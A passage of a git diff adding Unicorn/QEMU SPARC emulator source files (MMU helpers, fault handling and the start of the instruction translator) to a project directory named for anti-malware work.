helper_raise_exception(env, TT_CODE_ACCESS); + } else { + helper_raise_exception(env, TT_DATA_ACCESS); + } + } + + /* flush neverland mappings created during no-fault mode, + so the sequential MMU faults report proper fault types */ + if (env->mmuregs[0] & MMU_NF) { + tlb_flush(cs, 1); + } +} +#else +void sparc_cpu_unassigned_access(CPUState *cs, hwaddr addr, + bool is_write, bool is_exec, int is_asi, + unsigned size) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + +#ifdef DEBUG_UNASSIGNED + printf("Unassigned mem access to " TARGET_FMT_plx " from " TARGET_FMT_lx + "\n", addr, env->pc); +#endif + + if (is_exec) { + helper_raise_exception(env, TT_CODE_ACCESS); + } else { + helper_raise_exception(env, TT_DATA_ACCESS); + } +} +#endif +#endif + +#if !defined(CONFIG_USER_ONLY) +void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cs, + vaddr addr, int is_write, + int is_user, uintptr_t retaddr) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + +#ifdef DEBUG_UNALIGNED + printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx + "\n", addr, env->pc); +#endif + if (retaddr) { + cpu_restore_state(CPU(cpu), retaddr); + } + helper_raise_exception(env, TT_UNALIGNED); +} + +/* try to fill the TLB and return an exception if error. If retaddr is + NULL, it means that the function was called in C code (i.e. not + from generated code or from helper.c) */ +/* XXX: fix it to restore all registers */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = sparc_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (ret) { + if (retaddr) { + cpu_restore_state(cs, retaddr); + } + cpu_loop_exit(cs); + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/mmu_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/mmu_helper.c new file mode 100644 index 0000000..9c3b2ce --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/mmu_helper.c @@ -0,0 +1,867 @@ +/* + * Sparc MMU helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/address-spaces.h" + +/* Sparc MMU emulation */ + +#if defined(CONFIG_USER_ONLY) + +int sparc_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + if (rw & 2) { + cs->exception_index = TT_TFAULT; + } else { + cs->exception_index = TT_DFAULT; + } + return 1; +} + +#else + +#ifndef TARGET_SPARC64 +/* + * Sparc V8 Reference MMU (SRMMU) + */ +static const int access_table[8][8] = { + { 0, 0, 0, 0, 8, 0, 12, 12 }, + { 0, 0, 0, 0, 8, 0, 0, 0 }, + { 8, 8, 0, 0, 0, 8, 12, 12 }, + { 8, 8, 0, 0, 0, 8, 0, 0 }, + { 8, 0, 8, 0, 8, 8, 12, 12 }, + { 8, 0, 8, 0, 8, 0, 8, 0 }, + { 8, 8, 8, 0, 8, 8, 12, 12 }, + { 8, 8, 8, 0, 8, 8, 8, 0 } +}; + +static const int perm_table[2][8] = { + { + PAGE_READ, + PAGE_READ | PAGE_WRITE, + PAGE_READ | PAGE_EXEC, + PAGE_READ | PAGE_WRITE | PAGE_EXEC, + PAGE_EXEC, + PAGE_READ | PAGE_WRITE, + PAGE_READ | PAGE_EXEC, + PAGE_READ | PAGE_WRITE | PAGE_EXEC + }, + { + PAGE_READ, + PAGE_READ | PAGE_WRITE, + PAGE_READ | PAGE_EXEC, + PAGE_READ | PAGE_WRITE | PAGE_EXEC, + PAGE_EXEC, + PAGE_READ, + 0, + 0, + } +}; + +static int get_physical_address(CPUSPARCState *env, hwaddr *physical, + int *prot, int *access_index, + target_ulong address, int rw, int mmu_idx, + target_ulong *page_size) +{ + int access_perms = 0; + hwaddr pde_ptr; + uint32_t pde; + int error_code = 0, is_dirty, is_user; + unsigned long page_offset; + CPUState *cs = CPU(sparc_env_get_cpu(env)); + + is_user = mmu_idx == MMU_USER_IDX; + + if ((env->mmuregs[0] & MMU_E) == 0) { /* MMU disabled */ + *page_size = TARGET_PAGE_SIZE; + /* Boot mode: instruction fetches are taken from PROM */ + if (rw == 2 && (env->mmuregs[0] & env->def->mmu_bm)) { + *physical = env->prom_addr | (address & 0x7ffffULL); + *prot = PAGE_READ | PAGE_EXEC; + return 0; + } + *physical = address; + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + return 0; + } + + *access_index = ((rw & 1) << 2) | (rw & 2) | (is_user ? 0 : 1); + *physical = 0xffffffffffff0000ULL; + + /* SPARC reference MMU table walk: Context table->L1->L2->PTE */ + /* Context base + context number */ + pde_ptr = (env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); + pde = ldl_phys(cs->as, pde_ptr); + + /* Ctx pde */ + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return 1 << 2; + case 2: /* L0 PTE, maybe should not happen? */ + case 3: /* Reserved */ + return 4 << 2; + case 1: /* L0 PDE */ + pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return (1 << 8) | (1 << 2); + case 3: /* Reserved */ + return (1 << 8) | (4 << 2); + case 1: /* L1 PDE */ + pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return (2 << 8) | (1 << 2); + case 3: /* Reserved */ + return (2 << 8) | (4 << 2); + case 1: /* L2 PDE */ + pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + return (3 << 8) | (1 << 2); + case 1: /* PDE, should not happen */ + case 3: /* Reserved */ + return (3 << 8) | (4 << 2); + case 2: /* L3 PTE */ + page_offset = 0; + } + *page_size = TARGET_PAGE_SIZE; + break; + case 2: /* L2 PTE */ + page_offset = address & 0x3f000; + *page_size = 0x40000; + } + break; + case 2: /* L1 PTE */ + page_offset = address & 0xfff000; + *page_size = 0x1000000; + } + } + + /* check access */ + access_perms = (pde & PTE_ACCESS_MASK) >> PTE_ACCESS_SHIFT; + error_code = access_table[*access_index][access_perms]; + if (error_code && !((env->mmuregs[0] & MMU_NF) && is_user)) { + return error_code; + } + + /* update page modified and dirty bits */ + is_dirty = (rw & 1) && !(pde & PG_MODIFIED_MASK); + if (!(pde & PG_ACCESSED_MASK) || is_dirty) { + pde |= PG_ACCESSED_MASK; + if (is_dirty) { + pde |= PG_MODIFIED_MASK; + } + stl_phys_notdirty(cs->as, pde_ptr, pde); + } + + /* the page can be put in the TLB */ + *prot = perm_table[is_user][access_perms]; + if (!(pde & PG_MODIFIED_MASK)) { + /* only set write access if already dirty... otherwise wait + for dirty access */ + *prot &= ~PAGE_WRITE; + } + + /* Even if large ptes, we map only one 4KB page in the cache to + avoid filling it too fast */ + *physical = ((hwaddr)(pde & PTE_ADDR_MASK) << 4) + page_offset; + return error_code; +} + +/* Perform address translation */ +int sparc_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + hwaddr paddr; + target_ulong vaddr; + target_ulong page_size; + int error_code = 0, prot, access_index; + + address &= TARGET_PAGE_MASK; + error_code = get_physical_address(env, &paddr, &prot, &access_index, + address, rw, mmu_idx, &page_size); + vaddr = address; + if (error_code == 0) { +#ifdef DEBUG_MMU + printf("Translate at %" VADDR_PRIx " -> " TARGET_FMT_plx ", vaddr " + TARGET_FMT_lx "\n", address, paddr, vaddr); +#endif + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); + return 0; + } + + if (env->mmuregs[3]) { /* Fault status register */ + env->mmuregs[3] = 1; /* overflow (not read before another fault) */ + } + env->mmuregs[3] |= (access_index << 5) | error_code | 2; + env->mmuregs[4] = address; /* Fault address register */ + + if ((env->mmuregs[0] & MMU_NF) || env->psret == 0) { + /* No fault mode: if a mapping is available, just override + permissions. If no mapping is available, redirect accesses to + neverland. Fake/overridden mappings will be flushed when + switching to normal mode. */ + prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, TARGET_PAGE_SIZE); + return 0; + } else { + if (rw & 2) { + cs->exception_index = TT_TFAULT; + } else { + cs->exception_index = TT_DFAULT; + } + return 1; + } +} + +target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + hwaddr pde_ptr; + uint32_t pde; + + /* Context base + context number */ + pde_ptr = (hwaddr)(env->mmuregs[1] << 4) + + (env->mmuregs[2] << 2); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 2: /* PTE, maybe should not happen? */ + case 3: /* Reserved */ + return 0; + case 1: /* L1 PDE */ + if (mmulev == 3) { + return pde; + } + pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 3: /* Reserved */ + return 0; + case 2: /* L1 PTE */ + return pde; + case 1: /* L2 PDE */ + if (mmulev == 2) { + return pde; + } + pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 3: /* Reserved */ + return 0; + case 2: /* L2 PTE */ + return pde; + case 1: /* L3 PDE */ + if (mmulev == 1) { + return pde; + } + pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); + pde = ldl_phys(cs->as, pde_ptr); + + switch (pde & PTE_ENTRYTYPE_MASK) { + default: + case 0: /* Invalid */ + case 1: /* PDE, should not happen */ + case 3: /* Reserved */ + return 0; + case 2: /* L3 PTE */ + return pde; + } + } + } + } + return 0; +} + +void dump_mmu(FILE *f, fprintf_function cpu_fprintf, CPUSPARCState *env) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + target_ulong va, va1, va2; + unsigned int n, m, o; + hwaddr pde_ptr, pa; + uint32_t pde; + + pde_ptr = (env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); + pde = ldl_phys(cs->as, pde_ptr); + (*cpu_fprintf)(f, "Root ptr: " TARGET_FMT_plx ", ctx: %d\n", + (hwaddr)env->mmuregs[1] << 4, env->mmuregs[2]); + for (n = 0, va = 0; n < 256; n++, va += 16 * 1024 * 1024) { + pde = mmu_probe(env, va, 2); + if (pde) { + pa = cpu_get_phys_page_debug(cs, va); + (*cpu_fprintf)(f, "VA: " TARGET_FMT_lx ", PA: " TARGET_FMT_plx + " PDE: " TARGET_FMT_lx "\n", va, pa, pde); + for (m = 0, va1 = va; m < 64; m++, va1 += 256 * 1024) { + pde = mmu_probe(env, va1, 1); + if (pde) { + pa = cpu_get_phys_page_debug(cs, va1); + (*cpu_fprintf)(f, " VA: " TARGET_FMT_lx ", PA: " + TARGET_FMT_plx " PDE: " TARGET_FMT_lx "\n", + va1, pa, pde); + for (o = 0, va2 = va1; o < 64; o++, va2 += 4 * 1024) { + pde = mmu_probe(env, va2, 0); + if (pde) { + pa = cpu_get_phys_page_debug(cs, va2); + (*cpu_fprintf)(f, " VA: " TARGET_FMT_lx ", PA: " + TARGET_FMT_plx " PTE: " + TARGET_FMT_lx "\n", + va2, pa, pde); + } + } + } + } + } + } +} + +/* Gdb expects all registers windows to be flushed in ram. This function handles + * reads (and only reads) in stack frames as if windows were flushed. We assume + * that the sparc ABI is followed. + */ +int sparc_cpu_memory_rw_debug(CPUState *cs, vaddr address, + uint8_t *buf, int len, bool is_write) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + target_ulong addr = address; + int i; + int len1; + int cwp = env->cwp; + + if (!is_write) { + for (i = 0; i < env->nwindows; i++) { + int off; + target_ulong fp = env->regbase[cwp * 16 + 22]; + + /* Assume fp == 0 means end of frame. */ + if (fp == 0) { + break; + } + + cwp = cpu_cwp_inc(env, cwp + 1); + + /* Invalid window ? */ + if (env->wim & (1 << cwp)) { + break; + } + + /* According to the ABI, the stack is growing downward. */ + if (addr + len < fp) { + break; + } + + /* Not in this frame. */ + if (addr > fp + 64) { + continue; + } + + /* Handle access before this window. */ + if (addr < fp) { + len1 = fp - addr; + if (cpu_memory_rw_debug(cs, addr, buf, len1, is_write) != 0) { + return -1; + } + addr += len1; + len -= len1; + buf += len1; + } + + /* Access byte per byte to registers. Not very efficient but speed + * is not critical. + */ + off = addr - fp; + len1 = 64 - off; + + if (len1 > len) { + len1 = len; + } + + for (; len1; len1--) { + int reg = cwp * 16 + 8 + (off >> 2); + union { + uint32_t v; + uint8_t c[4]; + } u; + u.v = cpu_to_be32(env->regbase[reg]); + *buf++ = u.c[off & 3]; + addr++; + len--; + off++; + } + + if (len == 0) { + return 0; + } + } + } + return cpu_memory_rw_debug(cs, addr, buf, len, is_write); +} + +#else /* !TARGET_SPARC64 */ + +/* 41 bit physical address space */ +static inline hwaddr ultrasparc_truncate_physical(uint64_t x) +{ + return x & 0x1ffffffffffULL; +} + +/* + * UltraSparc IIi I/DMMUs + */ + +/* Returns true if TTE tag is valid and matches virtual address value + in context requires virtual address mask value calculated from TTE + entry size */ +static inline int ultrasparc_tag_match(SparcTLBEntry *tlb, + uint64_t address, uint64_t context, + hwaddr *physical) +{ + uint64_t mask; + + switch (TTE_PGSIZE(tlb->tte)) { + default: + case 0x0: /* 8k */ + mask = 0xffffffffffffe000ULL; + break; + case 0x1: /* 64k */ + mask = 0xffffffffffff0000ULL; + break; + case 0x2: /* 512k */ + mask = 0xfffffffffff80000ULL; + break; + case 0x3: /* 4M */ + mask = 0xffffffffffc00000ULL; + break; + } + + /* valid, context match, virtual address match? */ + if (TTE_IS_VALID(tlb->tte) && + (TTE_IS_GLOBAL(tlb->tte) || tlb_compare_context(tlb, context)) + && compare_masked(address, tlb->tag, mask)) { + /* decode physical address */ + *physical = ((tlb->tte & mask) | (address & ~mask)) & 0x1ffffffe000ULL; + return 1; + } + + return 0; +} + +static int get_physical_address_data(CPUSPARCState *env, + hwaddr *physical, int *prot, + target_ulong address, int rw, int mmu_idx) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + unsigned int i; + uint64_t context; + uint64_t sfsr = 0; + + int is_user = (mmu_idx == MMU_USER_IDX || + mmu_idx == MMU_USER_SECONDARY_IDX); + + if ((env->lsu & DMMU_E) == 0) { /* DMMU disabled */ + *physical = ultrasparc_truncate_physical(address); + *prot = PAGE_READ | PAGE_WRITE; + return 0; + } + + switch (mmu_idx) { + case MMU_USER_IDX: + case MMU_KERNEL_IDX: + context = env->dmmu.mmu_primary_context & 0x1fff; + sfsr |= SFSR_CT_PRIMARY; + break; + case MMU_USER_SECONDARY_IDX: + case MMU_KERNEL_SECONDARY_IDX: + context = env->dmmu.mmu_secondary_context & 0x1fff; + sfsr |= SFSR_CT_SECONDARY; + break; + case MMU_NUCLEUS_IDX: + sfsr |= SFSR_CT_NUCLEUS; + /* FALLTHRU */ + default: + context = 0; + break; + } + + if (rw == 1) { + sfsr |= SFSR_WRITE_BIT; + } else if (rw == 4) { + sfsr |= SFSR_NF_BIT; + } + + for (i = 0; i < 64; i++) { + /* ctx match, vaddr match, valid? */ + if (ultrasparc_tag_match(&env->dtlb[i], address, context, physical)) { + int do_fault = 0; + + /* access ok? */ + /* multiple bits in SFSR.FT may be set on TT_DFAULT */ + if (TTE_IS_PRIV(env->dtlb[i].tte) && is_user) { + do_fault = 1; + sfsr |= SFSR_FT_PRIV_BIT; /* privilege violation */ + //trace_mmu_helper_dfault(address, context, mmu_idx, env->tl); + } + if (rw == 4) { + if (TTE_IS_SIDEEFFECT(env->dtlb[i].tte)) { + do_fault = 1; + sfsr |= SFSR_FT_NF_E_BIT; + } + } else { + if (TTE_IS_NFO(env->dtlb[i].tte)) { + do_fault = 1; + sfsr |= SFSR_FT_NFO_BIT; + } + } + + if (do_fault) { + /* faults above are reported with TT_DFAULT. */ + cs->exception_index = TT_DFAULT; + } else if (!TTE_IS_W_OK(env->dtlb[i].tte) && (rw == 1)) { + do_fault = 1; + cs->exception_index = TT_DPROT; + + //trace_mmu_helper_dprot(address, context, mmu_idx, env->tl); + } + + if (!do_fault) { + *prot = PAGE_READ; + if (TTE_IS_W_OK(env->dtlb[i].tte)) { + *prot |= PAGE_WRITE; + } + + TTE_SET_USED(env->dtlb[i].tte); + + return 0; + } + + if (env->dmmu.sfsr & SFSR_VALID_BIT) { /* Fault status register */ + sfsr |= SFSR_OW_BIT; /* overflow (not read before + another fault) */ + } + + if (env->pstate & PS_PRIV) { + sfsr |= SFSR_PR_BIT; + } + + /* FIXME: ASI field in SFSR must be set */ + env->dmmu.sfsr = sfsr | SFSR_VALID_BIT; + + env->dmmu.sfar = address; /* Fault address register */ + + env->dmmu.tag_access = (address & ~0x1fffULL) | context; + + return 1; + } + } + + //trace_mmu_helper_dmiss(address, context); + + /* + * On MMU misses: + * - UltraSPARC IIi: SFSR and SFAR unmodified + * - JPS1: SFAR updated and some fields of SFSR updated + */ + env->dmmu.tag_access = (address & ~0x1fffULL) | context; + cs->exception_index = TT_DMISS; + return 1; +} + +static int get_physical_address_code(CPUSPARCState *env, + hwaddr *physical, int *prot, + target_ulong address, int mmu_idx) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + unsigned int i; + uint64_t context; + + int is_user = (mmu_idx == MMU_USER_IDX || + mmu_idx == MMU_USER_SECONDARY_IDX); + + if ((env->lsu & IMMU_E) == 0 || (env->pstate & PS_RED) != 0) { + /* IMMU disabled */ + *physical = ultrasparc_truncate_physical(address); + *prot = PAGE_EXEC; + return 0; + } + + if (env->tl == 0) { + /* PRIMARY context */ + context = env->dmmu.mmu_primary_context & 0x1fff; + } else { + /* NUCLEUS context */ + context = 0; + } + + for (i = 0; i < 64; i++) { + /* ctx match, vaddr match, valid? */ + if (ultrasparc_tag_match(&env->itlb[i], + address, context, physical)) { + /* access ok? */ + if (TTE_IS_PRIV(env->itlb[i].tte) && is_user) { + /* Fault status register */ + if (env->immu.sfsr & SFSR_VALID_BIT) { + env->immu.sfsr = SFSR_OW_BIT; /* overflow (not read before + another fault) */ + } else { + env->immu.sfsr = 0; + } + if (env->pstate & PS_PRIV) { + env->immu.sfsr |= SFSR_PR_BIT; + } + if (env->tl > 0) { + env->immu.sfsr |= SFSR_CT_NUCLEUS; + } + + /* FIXME: ASI field in SFSR must be set */ + env->immu.sfsr |= SFSR_FT_PRIV_BIT | SFSR_VALID_BIT; + cs->exception_index = TT_TFAULT; + + env->immu.tag_access = (address & ~0x1fffULL) | context; + + //trace_mmu_helper_tfault(address, context); + + return 1; + } + *prot = PAGE_EXEC; + TTE_SET_USED(env->itlb[i].tte); + return 0; + } + } + + //trace_mmu_helper_tmiss(address, context); + + /* Context is stored in DMMU (dmmuregs[1]) also for IMMU */ + env->immu.tag_access = (address & ~0x1fffULL) | context; + cs->exception_index = TT_TMISS; + return 1; +} + +static int get_physical_address(CPUSPARCState *env, hwaddr *physical, + int *prot, int *access_index, + target_ulong address, int rw, int mmu_idx, + target_ulong *page_size) +{ + /* ??? We treat everything as a small page, then explicitly flush + everything when an entry is evicted. */ + *page_size = TARGET_PAGE_SIZE; + + /* safety net to catch wrong softmmu index use from dynamic code */ + if (env->tl > 0 && mmu_idx != MMU_NUCLEUS_IDX) { + if (rw == 2) { + //trace_mmu_helper_get_phys_addr_code(env->tl, mmu_idx, + // env->dmmu.mmu_primary_context, + // env->dmmu.mmu_secondary_context, + // address); + } else { + //trace_mmu_helper_get_phys_addr_data(env->tl, mmu_idx, + // env->dmmu.mmu_primary_context, + // env->dmmu.mmu_secondary_context, + // address); + } + } + + if (rw == 2) { + return get_physical_address_code(env, physical, prot, address, + mmu_idx); + } else { + return get_physical_address_data(env, physical, prot, address, rw, + mmu_idx); + } +} + +/* Perform address translation */ +int sparc_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + target_ulong vaddr; + hwaddr paddr; + target_ulong page_size; + int error_code = 0, prot, access_index; + + address &= TARGET_PAGE_MASK; + error_code = get_physical_address(env, &paddr, &prot, &access_index, + address, rw, mmu_idx, &page_size); + if (error_code == 0) { + vaddr = address; + + //trace_mmu_helper_mmu_fault(address, paddr, mmu_idx, env->tl, + // env->dmmu.mmu_primary_context, + // env->dmmu.mmu_secondary_context); + + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); + return 0; + } + /* XXX */ + return 1; +} + +void dump_mmu(FILE *f, fprintf_function cpu_fprintf, CPUSPARCState *env) +{ + unsigned int i; + const char *mask; + + (*cpu_fprintf)(f, "MMU contexts: Primary: %" PRId64 ", Secondary: %" + PRId64 "\n", + env->dmmu.mmu_primary_context, + env->dmmu.mmu_secondary_context); + if ((env->lsu & DMMU_E) == 0) { + (*cpu_fprintf)(f, "DMMU disabled\n"); + } else { + (*cpu_fprintf)(f, "DMMU dump\n"); + for (i = 0; i < 64; i++) { + switch (TTE_PGSIZE(env->dtlb[i].tte)) { + default: + case 0x0: + mask = " 8k"; + break; + case 0x1: + mask = " 64k"; + break; + case 0x2: + mask = "512k"; + break; + case 0x3: + mask = " 4M"; + break; + } + if (TTE_IS_VALID(env->dtlb[i].tte)) { + (*cpu_fprintf)(f, "[%02u] VA: %" PRIx64 ", PA: %llx" + ", %s, %s, %s, %s, ctx %" PRId64 " %s\n", + i, + env->dtlb[i].tag & (uint64_t)~0x1fffULL, + TTE_PA(env->dtlb[i].tte), + mask, + TTE_IS_PRIV(env->dtlb[i].tte) ? "priv" : "user", + TTE_IS_W_OK(env->dtlb[i].tte) ? "RW" : "RO", + TTE_IS_LOCKED(env->dtlb[i].tte) ? + "locked" : "unlocked", + env->dtlb[i].tag & (uint64_t)0x1fffULL, + TTE_IS_GLOBAL(env->dtlb[i].tte) ? + "global" : "local"); + } + } + } + if ((env->lsu & IMMU_E) == 0) { + (*cpu_fprintf)(f, "IMMU disabled\n"); + } else { + (*cpu_fprintf)(f, "IMMU dump\n"); + for (i = 0; i < 64; i++) { + switch (TTE_PGSIZE(env->itlb[i].tte)) { + default: + case 0x0: + mask = " 8k"; + break; + case 0x1: + mask = " 64k"; + break; + case 0x2: + mask = "512k"; + break; + case 0x3: + mask = " 4M"; + break; + } + if (TTE_IS_VALID(env->itlb[i].tte)) { + (*cpu_fprintf)(f, "[%02u] VA: %" PRIx64 ", PA: %llx" + ", %s, %s, %s, ctx %" PRId64 " %s\n", + i, + env->itlb[i].tag & (uint64_t)~0x1fffULL, + TTE_PA(env->itlb[i].tte), + mask, + TTE_IS_PRIV(env->itlb[i].tte) ? "priv" : "user", + TTE_IS_LOCKED(env->itlb[i].tte) ? + "locked" : "unlocked", + env->itlb[i].tag & (uint64_t)0x1fffULL, + TTE_IS_GLOBAL(env->itlb[i].tte) ? + "global" : "local"); + } + } + } +} + +#endif /* TARGET_SPARC64 */ + +static int cpu_sparc_get_phys_page(CPUSPARCState *env, hwaddr *phys, + target_ulong addr, int rw, int mmu_idx) +{ + target_ulong page_size; + int prot, access_index; + + return get_physical_address(env, phys, &prot, &access_index, addr, rw, + mmu_idx, &page_size); +} + +#if defined(TARGET_SPARC64) +hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, + int mmu_idx) +{ + hwaddr phys_addr; + + if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 4, mmu_idx) != 0) { + return -1; + } + return phys_addr; +} +#endif + +hwaddr sparc_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + hwaddr phys_addr; + int mmu_idx = cpu_mmu_index(env); + MemoryRegionSection section; + + if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 2, mmu_idx) != 0) { + if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 0, mmu_idx) != 0) { + return -1; + } + } + section = memory_region_find(get_system_memory(cs->uc), phys_addr, 1); + memory_region_unref(section.mr); + if (!int128_nz(section.size)) { + return -1; + } + return phys_addr; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/translate.c new file mode 100644 index 0000000..f39a70e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/translate.c @@ -0,0 +1,5719 @@ +/* + SPARC translation + + Copyright (C) 2003 Thomas M. Ogrisegg + Copyright (C) 2003-2005 Fabrice Bellard + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, see . + */ + +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "tcg-op.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#define DYNAMIC_PC 1 /* dynamic pc value */ +#define JUMP_PC 2 /* dynamic pc value which takes only two values + according to jump_pc[T2] */ + + +typedef struct DisasContext { + target_ulong pc; /* current Program Counter: integer or DYNAMIC_PC */ + target_ulong npc; /* next PC: integer or DYNAMIC_PC or JUMP_PC */ + target_ulong jump_pc[2]; /* used when JUMP_PC pc value is used */ + int is_br; + int mem_idx; + int fpu_enabled; + int address_mask_32bit; + int singlestep; + uint32_t cc_op; /* current CC operation */ + struct TranslationBlock *tb; + sparc_def_t *def; + TCGv_i32 t32[3]; + TCGv ttl[6]; + int n_t32; + int n_ttl; + + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + +typedef struct { + TCGCond cond; + bool is_bool; + bool g1, g2; + TCGv c1, c2; +} DisasCompare; + +// This function uses non-native bit order +#define GET_FIELD(X, FROM, TO) \ + ((X) >> (31 - (TO)) & ((1 << ((TO) - (FROM) + 1)) - 1)) + +// This function uses the order in the manuals, i.e. bit 0 is 2^0 +#define GET_FIELD_SP(X, FROM, TO) \ + GET_FIELD(X, 31 - (TO), 31 - (FROM)) + +#define GET_FIELDs(x,a,b) sign_extend (GET_FIELD(x,a,b), (b) - (a) + 1) +#define GET_FIELD_SPs(x,a,b) sign_extend (GET_FIELD_SP(x,a,b), ((b) - (a) + 1)) + +#ifdef TARGET_SPARC64 +#define DFPREG(r) (((r & 1) << 5) | (r & 0x1e)) +#define QFPREG(r) (((r & 1) << 5) | (r & 0x1c)) +#else +#define DFPREG(r) (r & 0x1e) +#define QFPREG(r) (r & 0x1c) +#endif + +#define UA2005_HTRAP_MASK 0xff +#define V8_TRAP_MASK 0x7f + +static int sign_extend(int x, int len) +{ + len = 32 - len; + return ((int)(((unsigned int)x) << len)) >> len; +} + +#define IS_IMM (insn & (1<<13)) + +static inline TCGv_i32 get_temp_i32(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 t; + assert(dc->n_t32 < ARRAY_SIZE(dc->t32)); + dc->t32[dc->n_t32++] = t = tcg_temp_new_i32(tcg_ctx); + return t; +} + +static inline TCGv get_temp_tl(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t; + assert(dc->n_ttl < ARRAY_SIZE(dc->ttl)); + dc->ttl[dc->n_ttl++] = t = tcg_temp_new(tcg_ctx); + return t; +} + +static inline void gen_update_fprs_dirty(DisasContext *dc, int rd) +{ +#if defined(TARGET_SPARC64) + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_ori_i32(tcg_ctx, tcg_ctx->cpu_fprs, tcg_ctx->cpu_fprs, (rd < 32) ? 1 : 2); +#endif +} + +/* floating point registers moves */ +static TCGv_i32 gen_load_fpr_F(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; +#if TCG_TARGET_REG_BITS == 32 + if (src & 1) { + return TCGV_LOW(tcg_ctx->cpu_fpr[src / 2]); + } else { + return TCGV_HIGH(tcg_ctx->cpu_fpr[src / 2]); + } +#else + if (src & 1) { + return MAKE_TCGV_I32(GET_TCGV_I64(tcg_ctx->cpu_fpr[src / 2])); + } else { + TCGv_i32 ret = get_temp_i32(dc); + TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->cpu_fpr[src / 2], 32); + 